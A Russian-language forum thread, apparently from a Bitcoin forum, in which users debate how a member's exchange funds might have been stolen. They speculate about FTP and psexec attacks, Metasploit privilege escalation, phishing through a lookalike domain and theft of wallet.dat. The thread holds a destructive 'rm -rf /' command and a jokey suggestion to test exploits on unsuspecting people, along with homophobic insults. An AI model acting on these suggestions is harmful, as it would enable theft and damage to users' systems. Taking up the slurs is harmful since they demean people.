Извини что обидел если или вызвал негодование, считай я другим написал это, автору темы как минимум.
Я как написал выше не спец, и только ознакамливаюсь с материалом.
Если ты можешь изложить поще и понятней, то может кому-то поможет.
Да это возможно для тебя кажется простейшим и понятным вариантом все знают и т.д.
Но уверяю тебя не понимают люди самого принципа откуда и как это берется.
Вот автор темы наверно много чего не знает как его могли "факнуть" кто-то кроме биржи.
Поэтому придумал что это биржа, потому что:
... и т.д. тут варианты в принципе похожие у всех, типа всё было сделано за пол минуты поэтому это биржа.
Если конечно имела места пропажа денег вообще.

Там было написано что-то вроде что порт 7777 это какого-то фтп сервера с уязвимостью, я и написал про это если так то как оно могло бы быть использовано людям показал, если оно реально так.

" чем ты говоришь что браузеры уязвины, что на порно сайтах есть ифреймы, может ты даш вырезку из муви 43 где говорят "ууу лазил по гиперссылкам на порносайтах, словил переполнение в браузере, у тебя вирусы" да ты дибил конченный ? думаешь этого не понимают ? ты не на форуме блондинок рассказывай сказки там."
Это ты так думаешь что тут все настолько же умные и знающие, я вижу что ты разбираешься.
Вот в том то и дело что не понимают, считай форум блондинок, да, потому что сейчас основная толпа занимается краниками и реф ссылками. Или торгуют на бирже. Почему они должны понимать?
И в чате бтце тоже мало кто что понимает, да есть люди понимают, есть, но как и тут ну пусть 10% таких как ты понимающих. А остальные "блондинки" которые между тем и создают тему:
"-биржа меня обокрала"
-только тебя? А как же другие? Мы слышали настоящие криптоговнобиржи всех обворовывают?
"-нет, эта меня и еще я видел 5 тем на форуме других людей"
-подробности пытался выяснить? Ведь ты кричишь 40к - серьезные деньги.
-нет, всё от и то должна сделать биржа, провести расследования, отыскать виновного и кастрировать, к провайдеру, ментам, поддержки емэйла я обращаться не намерян. Тут варианты "не хотят ничего делать" "мне дали какие-то циферки" и т.д.
-зачем ты сюда пишешь тогда тем более через неделю?
"-не ваше дело почему я сюда пишу, и почему через неделю, и объяснять вам ничего и разговаривать с вами я не намерян"

То есть как бы ты же понимаешь какого вида от кого этот тролинг дешевый от какого-то стандартного пиарасского школьника зарабатывающего на пиаре, и на кого был рассчитан?
Зря ты думаешь что тут все разбираются и все поняли что это тролль.
10% разбираются. 10% поняли.
Остальные повелись, "ведь это уже N раз пишут, я постоянно вижу такие темы"
Если бы все такие тут умные были как ты описываешь не блондинки, то даже попыток подобного трольского вброса бы не было.

[BigBobo]

Куда пропал ТС ? Написал бы что да как, а то все размыто.

[becool]

оу да ладно hxxp://www.securitylab.ru/analytics/361827.php это та уязвисость что на скрине

что вы передегиваете какая командная строка речь идет о фтп достпупе с правами на закачку, или и то без них... вы знаете что по фтп файлы не исполняются ?

В вашем случае это гибрбриная атака ftp + psexec или share + psexec на исполнение файла, но тут об этом не говориться, ты голословен и не понимаешь о чем пишешь, эта атака направленна на 139 445 порты, а не на порт 7777

командная строка как в win так и nix квинтесенция доступа, особенно win до 2012 server так как повышение прав это 100%, в них после доступа к командоной строке все усилия сводятся к повышениею прав до root uid 0 gid 0 что тоже вполне реалистично... и что ты говоришь имеешь доступ к командой строке от админа можешь сделать format C:\, нет во первый не можешь, во вторых ты можешь предпринять все но не эту команду.

cntl + f ftp о чем ты говоришь ты понимаешь ? Kaht вспомни... повысить привелегии в системе имея доступ metsploit можно командой use priv или getsystem -h.

proof

hxxp://www.offensive-security.com/


rm -rf / и будет вам счать.

http://10.0.0.1:8080/

у меня не открывается ссылка =))) дайте vpn в вашу сеть.

Насчет 10.0.0.1 и формат ц это из статьи скопировано, понятное дело что формат ц не работает, но так написали может для прикола и т.д.
10.0.0.1 это локальный адрес.

Почему я передергиваю насчет фтп сервиса?
а почему вы решили что эксплоит на указаный какой-то там фтп сервис дает только фтп доступ и только в папку определенную этим самым сервером?
Я вот не знаю о каком он сервере писал и какой именно эксплоит.
Поэтому вариант да, что в нем есть уязвимость экзек.
А почему нет? Можно же и такое допускать, что никогда не было ни одного фтп сервера или других програм сервисов с подобной уязвимостью? Я думаю были.

насчет фтп я написал что смотря куда этот фтп, да написал что вариант к всему диску если будет, опять же почему нет? Не было ни одного подобного сплойта для фтп сервера?
Да и кстати кто вообще сказал что у пользователя там именно папка отдельная для фтп а не весь жесткий?
Как было подано, так и написал по максимуму.
По сему:
"В вашем случае это гибрбриная атака ftp + psexec или share + psexec на исполнение файла, но тут об этом не говориться, ты голословен и не понимаешь о чем пишешь, эта атака направленна на 139 445 порты, а не на порт 7777"
Во первых тут и не говорится об отсутствии этого и не указывается каков там на самом деле тот самый фтп сервер.
И какова его уязвимость.
Во вторых а клиенту религия мешает расшарить весь диск в этом самом фтп сервере?
Он же ставить троекратно охереть сложный пароль, а еще фтп сервер сразу динамит на час того кто три раза ввел неправильно! Почему он должен думать что будет или есть уязвимость и поэтому не стоит расшаривать весь диск на запись?
Ты так говоришь словно это твой фтп сервер взламывают, где ты всё знаешь что не может быть того и этого и т.д.
Вот я например встречал что люди в локалке в DC++ расшаривают весь диск, чего парится?
Написано было надо побольше гигов чтобы нода тебя не пинала, ну так и как это сделать?
Ясен пень нужно расшарить весь диск C!!! Обязательно!!
Да, папка пользователя почему то при этом недоступна, грусть печаль(((
Но зато доступна папка программ филес например, или другие на диске ц, а там и пароли аськи которая держала каталог свой в програм филес. и почтовой программы возможно, и вот как раз тот самый вариант запуска через ярлычок любимой программы если бы уровень доступа был запись, а не чтение как в дц++

Насчет повышения уровня доступа спасибо за инфу, но...
В описаных выше случаях оно нахер не нужно, в том и дело.
Спереть утащить валет.дат можно и под пользовательскими правами.
или приват кей из него.
Проделать то самое на бирже что вначале темы писали можно тоже с пользовательскими правами.

[Yaremi]

О, becool хорошо осваивает. так глядишь и новы утянет. Уже ближе.

Только FTP сервер должен стоять не у жертвы, а на сервере атакующего.

[FAN]

алгоритм намного проще...
находим кто хочет меняться р2р...
дальше при помощи приватных ключей

все содержимое кошельков переводится на нужные кошели...
 

[becool]

алгоритм намного проще...
находим кто хочет меняться р2р...
дальше при помощи приватных ключей

все содержимое кошельков переводится на нужные кошели...
 

Кстати у меня есть паяльная лампа, я ей клетки для рабов раз в год дезинфицирую, чтобы пореже болели инфекционными заболеваниями, забочусь как никак))

[igorokkk]

Господа хацкеры! Чем без дела пиписьками меряться, вот призовое задание на 10 битков: http://habrahabr.ru/post/250339/

[Yaremi]

Господа хацкеры! Чем без дела пиписьками меряться, вот призовое задание на 10 битков: http://habrahabr.ru/post/250339/

также ещё тут 5 битков ждут своего хозяина:

Bounty: I don't have many bitcoins to throw at this, but 5 BTC go to the first person who can remove the protection from the key below:

1NPHardFPnejsycvne2gvirm5MCr9gnAbf
PsV8XM6n5FvjonHPwwjzqvzA6UXruAAJfQ5VwbXFCJrSQEiQ4gyNNDhuYfL8JUBt6mxt

To sweeten the deal: the password is 14 characters long, with upper and lower case letters only, and contains at least one dictionary word.

 

[Mr.Anonymous]

Черт, это все невероятно интересно, но не сейчас.

Yaremi, а к тебе дело есть. Прочти это https://bitcointalk.org/index.php?topic=954717.msg10592752#msg10592752  и это https://bitcointalk.org/index.php?topic=954717.msg10592828#msg10592828
и прокомментируй пожалуйста, а то ждем...

Или просто дай знать что нет смысла ждать ответа и тогда я конечно пойму, но ...

[aatbf]

вот флуда то развели...

интересно, куда неожиданно пропал автор. обещал, что прям скоро биржа должна дать ему ответ и с тех пор ни слуха, ни духа
кто мониторит его тему на бтксеке, есть там что?

[Asatur]

вот флуда то развели...
интересно, куда неожиданно пропал автор. обещал, что прям скоро биржа должна дать ему ответ и с тех пор ни слуха, ни духа
кто мониторит его тему на бтксеке, есть там что?

Там всё так же, только флуда меньше.

[becool]

Не знаю я как взломать комп fsb4000, нашел только инфу как юзать эксплойты с коннектом к тебе с компа.
Чел должен браузером зайти по ссылке и тогда ты получаешь доступ.
Ссылка естественно может быть в фрейме или переадресацией, с адреса вида:
bitcointa.lk вместо bitcointalk.org
Кто через поисковик попадал на это дерьмо примазавшееся к реальному форуму?
И ведь поскуда постоянно его результаты высоко сверху находятся, бывало что и выше самого толка.
Кто дает гарантию что в этом дерьмоподмазе нет соответствующего эксплойта?
А потом появится новая тема пропал охуилион с биржи и своровала биржа.
А сколько человек попадают на этот говносайт? наверняка тысячи!

[tvskit]

Не знаю я как взломать комп fsb4000, нашел только инфу как юзать эксплойты с коннектом к тебе с компа.
Чел должен браузером зайти по ссылке и тогда ты получаешь доступ.
Ссылка естественно может быть в фрейме или переадресацией, с адреса вида:
bitcointa.lk вместо bitcointalk.org
Кто через поисковик попадал на это дерьмо примазавшееся к реальному форуму?
И ведь поскуда постоянно его результаты высоко сверху находятся, бывало что и выше самого толка.
Кто дает гарантию что в этом дерьмоподмазе нет соответствующего эксплойта?
А потом появится новая тема пропал охуилион с биржи и своровала биржа.
А сколько человек попадают на этот говносайт? наверняка тысячи!

Эксплойты вещь интересная и замечательная, и всязи сэтим надо быть очень аккуратным. Попробуй эксплойт на крановщиках. 

Или посылаешь, если женский пол, то письмо типа "я похудела на 10 кг поедая котлеты", а мужской пол, типа "Я увеличил хер сидя на диване" вот тебе потенциальные жертвы для эксперементов.

[Mr.Anonymous]

Asatur, когда здесь починишь разметку https://bitcointalk.org/index.php?topic=954717.msg10585453#msg10585453 ?

[becool]

Вы всегда мыслите столь поверхностно? Вот хоть поняли к чему был приведен CVE-2011-2013 ?

Я всегда мыслю и этого достаточно. А вы знакомы с понятием относительности? Вы привели пример дырки. Хорошо. Я тоже приведу. Вот, к примеру, есть Мр. Аноним и у него между ног есть дырка. Значит, он в некотором смысле женщина, если упомянуть это в разговорной речи без более глубокого описания. Он женщина относительно пенька на поляне, например. А вот относительно других людей он всё-таки не совсем женщина, так как у них в наличие больше одной дырки между ног. Надеюсь, что вы поняли к чему были приведены примеры дырок?

У меня приятель как-то с такими примерами по харе схлопотал, а потом обиделся как так.
Не то что обиделся, а типа вообще не понял за что.
Тогда еще не модно было быть либерастом и толерастом, но всетаки он заранее уже был толерастом, до того как это появилось в России и стало раскручиваться.
Есть вот такие **анутые толерасты которым нравится представлять что они девушка или их друг девушка.
Таким надо не то что въехать в **ало, а хорошенько въехать, чтобы и завтра вспомнил и подумал что наверно такую толерастию свою не стоит на людей переводить.
А вот так с виду никогда и не скажешь кто такой толератией страдает.

Это я к тому что если у тебя твое "предположим" ты с них таких мечт вздрачиваешься "чисто теоретически" на мужской пол, то держи свои сексуальные фантазии при себе, а то можно схватить уже и "чисто практически".

Т.е. " Я всегда мыслю и этого достаточно. А вы знакомы с понятием относительности? Вы привели пример дырки. Хорошо. Я тоже приведу. Вот, к примеру, есть Мр. Аноним и у него между ног есть дырка." - мысли куда-то в другую сторону если умеешь мыслить, кстати схватить в **ало это может быть еще и не худшим случаем, а лучшим вариантом, аккуратнее.

Хотя современные школьники все напрочь такие. Но это ничего не меняет, пару раз попадут в истории голова и прочистится от мечты быть девочкой или видеть в ком-то девочек.
А может и нет, не знаю, но как-то раньше другие пацаны были, без подобного дерьма.

Тем более когда не знаешь кому.

В следущий раз что-то такое придет в голову сказать - скажи браткам в 90ые:-) Я вот так сказал одному из далека не видел кто (как ты сейчас тоже же не знаешь кто такой анонимус), сдуру, а он второго привел, один мастер другой кмс и с оружием, в лесу. По счастливой случайности (они были пьяные и другое) удалось только немного быть помятым и убежать, а могло кончится куда хуже.

Да, кстати а этот самый приятель указаный выше перед этим как мне прогнатьту хероту что выше написана тоже бандитам в другой раз было какую-то херь прогонял не понятную, там один психованый был, у кого вся спина сгоревшая как голое мясо х.з. как умудрился, тот его пристрелить хотел не разобрав что тот сказал.

Так что думать надо аккуратней, и среди тех с кем общаешься тоже чтобы были люди кто думают аккуратно, а то вот так можно много чего надумать просто не того что нужно.